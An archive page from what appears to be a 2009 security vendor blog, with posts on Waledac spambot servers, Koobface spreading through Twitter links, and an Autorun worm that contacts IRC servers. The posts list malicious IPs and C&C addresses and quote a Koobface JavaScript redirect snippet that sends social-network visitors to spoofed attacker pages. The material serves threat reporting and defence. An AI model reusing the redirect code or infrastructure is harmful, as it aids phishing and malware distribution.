|
Archive for the ‘Worm’ Category
Monday, August 24th, 2009
We may be seeing the stirrings of yet another Waledac distribution. Servers at 95.211.8.215 and 95.211.8.161 have been serving up a number of unusually named files since the 20th that appear to maintain not only the common Waledac unpacking stub, but some of the classic characteristics of the Waledac trojan/worm — the email/spam engine, AES encrypted/bzip2 compressed P2P peering listing, DDoS capabilities, http C&C contact, email harvester, and credential stealing functionality. Along with the FakeAv downloads coming from these servers, these executables may be a variant on the spambot. We’ll update this post with more information as we more accurately identify the malware.
Update: Some of the files definitely are Waledac spam/dos bots, with encoded command and control communications retrieved from http://cismosis. com/up21.php (there are others), as evidenced here:
AV detection is surprisingly low for these executables, be sure to add a layer of behavioral protection to your system with ThreatFire.
Posted in Undetected malware, Waledac, Worm | No Comments »
Friday, August 7th, 2009
koob-Face or ter-Twit? The ongoing abuse of twitter feeds by malware distributors continues to net more social networking victims. As always, be wary of any executable you are prompted to download and execute. Currently, evil tweets for “My home video  ” or “cool video! WOW!” redirect to a set of spoofed social network pages. The malicious pages present visiting users with a prompt for a plugin install, “Flash player upgrade required”. An example here:
The malicious Koobace worm that ThreatFire has been preventing on desktops is served up and named “setup.exe” from this site. Interestingly, a number of these ip addresses serving up Koobface have been in use by Waledac distributors.
The ThreatFire community has been reporting the Koobface nastiness being served from multiple web servers today, with fairly heavy Koobface volume from web servers hosted on these ip addresses:
24.99.76.139
68.190.49.24
76.127.120.44
81.108.192.83
91.121.135.189
199.0.205.28
Update: Thankfully, as the malware distributors have changed some of their tweet tactics, their web server at kukuruku-290709. com has been pulled out from under them. Here is an example portion of javascript (mods mine) hosted on redirect pages that examines the victim’s search url, and based on a list of extremely popular social networking sites, redirects them to a variety of spoofed pages:
// KROTEGvar
abc1 = 'hxxp://kukuruku-290709. com/go/';
var abc2 = 'hxxp://kukuruku-290709. com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook. com', abc+'fb.php'],
['tagged. com', abc+'tg.php'],
['friendster. com',abc+'fr.php'],
['myspace. com', abc+'ms.php'],
['msplinks. com', abc+'ms.php'],
['myyearbook. com',abc+'yb.php'],
['fubar. com', abc+'fu.php'],
['twitter. com', abc+'tw.php'],
['hi5. com', abc+'hi5.php'],
['bebo. com', abc+'be.php']];
Again, if you are a user of these sites and receive a tweet from someone you don’t know that redirects you to a page that serves up an executable download, be very suspicious. And of course, run a behavioral-based solution like ThreatFire as a layer on your system.
Posted in Bot, Koobface, Social Engineering, Trojan, Worm | 1 Comment »
Tuesday, June 2nd, 2009
A new variant of an Autorun worm is on the loose, probably created by another childish and angry ex-lover. The little multithreaded beast injects into windows explorer, and attempts to communicate with one of several Irc servers at June.IRCdevils.net, June.helldark.biz, and June.a7aneek.net with a “VirUS/Virus” user/pass and a “VirUS-randstring” nick.
We noticed it this morning on multiple machines, and it seems to be spreading. The worm injects itself into the Windows explorer shell, and from there attempts to update multiple locations in the registry and removable drives like usb sticks with SETUP\DATA\June.exe.
It includes a nasty message in the accompanying autorun.inf file with a long annoying string.
;HEHhahahahehhehehahahahhehehehaha
It was packed with Armadillo, which potentially made it difficult to detect for the AV vendors — none detected it this morning, and this afternoon seems to bring only one or two vendors declaring it “suspicious” since we uploaded it to VirusTotal for sharing. Be sure to add true client-side behavioral protection to your system, and as always, use caution when sharing usb sticks with others.
We are seeing it running on systems alongside FakeAv installers, including “System Security”, where we see the fake scare tactics blaring “WARNING! 38 infections found!!!”. The two may be related, we are investigating.
Which of course, continues to nag the user with “System Security Firewall has blocked a program from accessing the internet” and pops its nag system tray balloon with “System Security Warning Your PC is still infected with dangerous viruses”
Posted in Autorun, FakeAlert, Rogueware, Worm | No Comments »
|
|
|
|
